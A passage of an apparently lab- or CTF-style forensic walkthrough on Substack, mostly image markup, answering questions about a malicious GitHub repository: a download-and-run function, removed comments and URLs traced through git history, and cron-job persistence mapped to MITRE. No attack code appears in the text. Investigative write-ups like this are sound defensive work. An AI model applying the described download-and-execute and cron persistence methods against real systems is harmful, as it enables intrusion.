https://substackcdn.com/image/fetch/$s_!3leS!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd48602a9-3c17-4995-b472-f5282f7377e8_1868x637.png 848w, https://substackcdn.com/image/fetch/$s_!3leS!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd48602a9-3c17-4995-b472-f5282f7377e8_1868x637.png 1272w, https://substackcdn.com/image/fetch/$s_!3leS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd48602a9-3c17-4995-b472-f5282f7377e8_1868x637.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><br></p><p><strong>4. What is the full URL of the file downloaded by the attacker?</strong></p><p>The function do_wget_and_run() is key to answering this question. By focusing on the variables f1 and f2, we can uncover the full URL that the attacker used to download the file.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!npm-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F247c8e83-fbab-44be-a36a-9d04619a3f73_812x505.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!npm-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F247c8e83-fbab-44be-a36a-9d04619a3f73_812x505.png 424w, https://substackcdn.com/image/fetch/$s_!npm-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F247c8e83-fbab-44be-a36a-9d04619a3f73_812x505.png 848w, https://substackcdn.com/image/fetch/$s_!npm-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F247c8e83-fbab-44be-a36a-9d04619a3f73_812x505.png 1272w, https://substackcdn.com/image/fetch/$s_!npm-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F247c8e83-fbab-44be-a36a-9d04619a3f73_812x505.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!npm-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F247c8e83-fbab-44be-a36a-9d04619a3f73_812x505.png" width="812" height="505" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/247c8e83-fbab-44be-a36a-9d04619a3f73_812x505.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:505,&quot;width&quot;:812,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:70215,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!npm-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F247c8e83-fbab-44be-a36a-9d04619a3f73_812x505.png 424w, https://substackcdn.com/image/fetch/$s_!npm-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F247c8e83-fbab-44be-a36a-9d04619a3f73_812x505.png 848w, https://substackcdn.com/image/fetch/$s_!npm-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F247c8e83-fbab-44be-a36a-9d04619a3f73_812x505.png 1272w, https://substackcdn.com/image/fetch/$s_!npm-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F247c8e83-fbab-44be-a36a-9d04619a3f73_812x505.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><p><strong>5. When did the attacker finally take out the real comments for the malicious function?</strong></p><p>To determine when the real comments were removed, we need to examine the history of the GitHub repository. This can be done by navigating to the "Activity" section on the GitHub repo, selecting the three dots, and comparing changes. By reviewing the deletions, we can pinpoint the specific change log, then pivot to Kali to run git commands and obtain the exact timestamp.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!byaj!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1b8bc7ef-a552-4fe8-9e40-ac115a360185_1995x529.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!byaj!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1b8bc7ef-a552-4fe8-9e40-ac115a360185_1995x529.png 424w, https://substackcdn.com/image/fetch/$s_!byaj!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1b8bc7ef-a552-4fe8-9e40-ac115a360185_1995x529.png 848w, https://substackcdn.com/image/fetch/$s_!byaj!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1b8bc7ef-a552-4fe8-9e40-ac115a360185_1995x529.png 1272w, https://substackcdn.com/image/fetch/$s_!byaj!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1b8bc7ef-a552-4fe8-9e40-ac115a360185_1995x529.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!byaj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1b8bc7ef-a552-4fe8-9e40-ac115a360185_1995x529.png" width="1456" height="386" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1b8bc7ef-a552-4fe8-9e40-ac115a360185_1995x529.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:386,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:78883,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!byaj!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1b8bc7ef-a552-4fe8-9e40-ac115a360185_1995x529.png 424w, https://substackcdn.com/image/fetch/$s_!byaj!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1b8bc7ef-a552-4fe8-9e40-ac115a360185_1995x529.png 848w, https://substackcdn.com/image/fetch/$s_!byaj!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1b8bc7ef-a552-4fe8-9e40-ac115a360185_1995x529.png 1272w, https://substackcdn.com/image/fetch/$s_!byaj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1b8bc7ef-a552-4fe8-9e40-ac115a360185_1995x529.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!W01G!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F788409a8-6b36-4dbb-810b-ac9aae3ade69_1344x671.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!W01G!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F788409a8-6b36-4dbb-810b-ac9aae3ade69_1344x671.png 424w, https://substackcdn.com/image/fetch/$s_!W01G!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F788409a8-6b36-4dbb-810b-ac9aae3ade69_1344x671.png 848w, https://substackcdn.com/image/fetch/$s_!W01G!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F788409a8-6b36-4dbb-810b-ac9aae3ade69_1344x671.png 1272w, https://substackcdn.com/image/fetch/$s_!W01G!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F788409a8-6b36-4dbb-810b-ac9aae3ade69_1344x671.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!W01G!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F788409a8-6b36-4dbb-810b-ac9aae3ade69_1344x671.png" width="1344" height="671" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/788409a8-6b36-4dbb-810b-ac9aae3ade69_1344x671.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:671,&quot;width&quot;:1344,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:108334,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!W01G!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F788409a8-6b36-4dbb-810b-ac9aae3ade69_1344x671.png 424w, https://substackcdn.com/image/fetch/$s_!W01G!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F788409a8-6b36-4dbb-810b-ac9aae3ade69_1344x671.png 848w, https://substackcdn.com/image/fetch/$s_!W01G!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F788409a8-6b36-4dbb-810b-ac9aae3ade69_1344x671.png 1272w, https://substackcdn.com/image/fetch/$s_!W01G!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F788409a8-6b36-4dbb-810b-ac9aae3ade69_1344x671.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!pcFm!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0cc7efe-17a4-462e-8621-76715c36dd42_840x865.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!pcFm!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0cc7efe-17a4-462e-8621-76715c36dd42_840x865.png 424w, https://substackcdn.com/image/fetch/$s_!pcFm!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0cc7efe-17a4-462e-8621-76715c36dd42_840x865.png 848w, https://substackcdn.com/image/fetch/$s_!pcFm!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0cc7efe-17a4-462e-8621-76715c36dd42_840x865.png 1272w, https://substackcdn.com/image/fetch/$s_!pcFm!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0cc7efe-17a4-462e-8621-76715c36dd42_840x865.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!pcFm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0cc7efe-17a4-462e-8621-76715c36dd42_840x865.png" width="840" height="865" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d0cc7efe-17a4-462e-8621-76715c36dd42_840x865.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:865,&quot;width&quot;:840,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:167444,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!pcFm!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0cc7efe-17a4-462e-8621-76715c36dd42_840x865.png 424w, https://substackcdn.com/image/fetch/$s_!pcFm!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0cc7efe-17a4-462e-8621-76715c36dd42_840x865.png 848w, https://substackcdn.com/image/fetch/$s_!pcFm!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0cc7efe-17a4-462e-8621-76715c36dd42_840x865.png 1272w, https://substackcdn.com/image/fetch/$s_!pcFm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0cc7efe-17a4-462e-8621-76715c36dd42_840x865.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><p><strong>6. The attacker changed the URL to download the file, what was it before the change?</strong></p><p>Using the same approach as in question 5, we can identify the previous URL by examining the version history and comparing changes to the repository.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!jgAh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7d303e1-3cb5-4b82-9520-ab00a8021a5d_1282x664.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!jgAh!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7d303e1-3cb5-4b82-9520-ab00a8021a5d_1282x664.png 424w, https://substackcdn.com/image/fetch/$s_!jgAh!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7d303e1-3cb5-4b82-9520-ab00a8021a5d_1282x664.png 848w, https://substackcdn.com/image/fetch/$s_!jgAh!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7d303e1-3cb5-4b82-9520-ab00a8021a5d_1282x664.png 1272w, https://substackcdn.com/image/fetch/$s_!jgAh!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7d303e1-3cb5-4b82-9520-ab00a8021a5d_1282x664.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!jgAh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7d303e1-3cb5-4b82-9520-ab00a8021a5d_1282x664.png" width="1282" height="664" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a7d303e1-3cb5-4b82-9520-ab00a8021a5d_1282x664.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:664,&quot;width&quot;:1282,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:94639,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!jgAh!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7d303e1-3cb5-4b82-9520-ab00a8021a5d_1282x664.png 424w, https://substackcdn.com/image/fetch/$s_!jgAh!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7d303e1-3cb5-4b82-9520-ab00a8021a5d_1282x664.png 848w, https://substackcdn.com/image/fetch/$s_!jgAh!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7d303e1-3cb5-4b82-9520-ab00a8021a5d_1282x664.png 1272w, https://substackcdn.com/image/fetch/$s_!jgAh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7d303e1-3cb5-4b82-9520-ab00a8021a5d_1282x664.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><p></p><p><strong>7. What is the MITRE technique ID utilized by the attacker to persist?</strong></p><p>Upon reviewing the script, we observe the attacker scheduling a cron job. This action points to a persistence mechanism, which corresponds to a specific MITRE technique ID related to cron job manipulation.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!wqjx!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8a86ec7-9e9a-4855-acb7-ede6f59c5bda_1338x521.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!wqjx!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8a86ec7-9e9a-4855-acb7-ede6f59c5bda_1338x521.png 424w, https://substackcdn.com/image/fetch/$s_!wqjx!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8a86ec7-9e9a-4855-acb7-ede6f59c5bda_1338x521.png 848w, https://substackcdn.com/image/fetch/$s_!wqjx!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8a86ec7-9e9a-4855-acb7-ede6f59c5bda_1338x521.png 1272w, 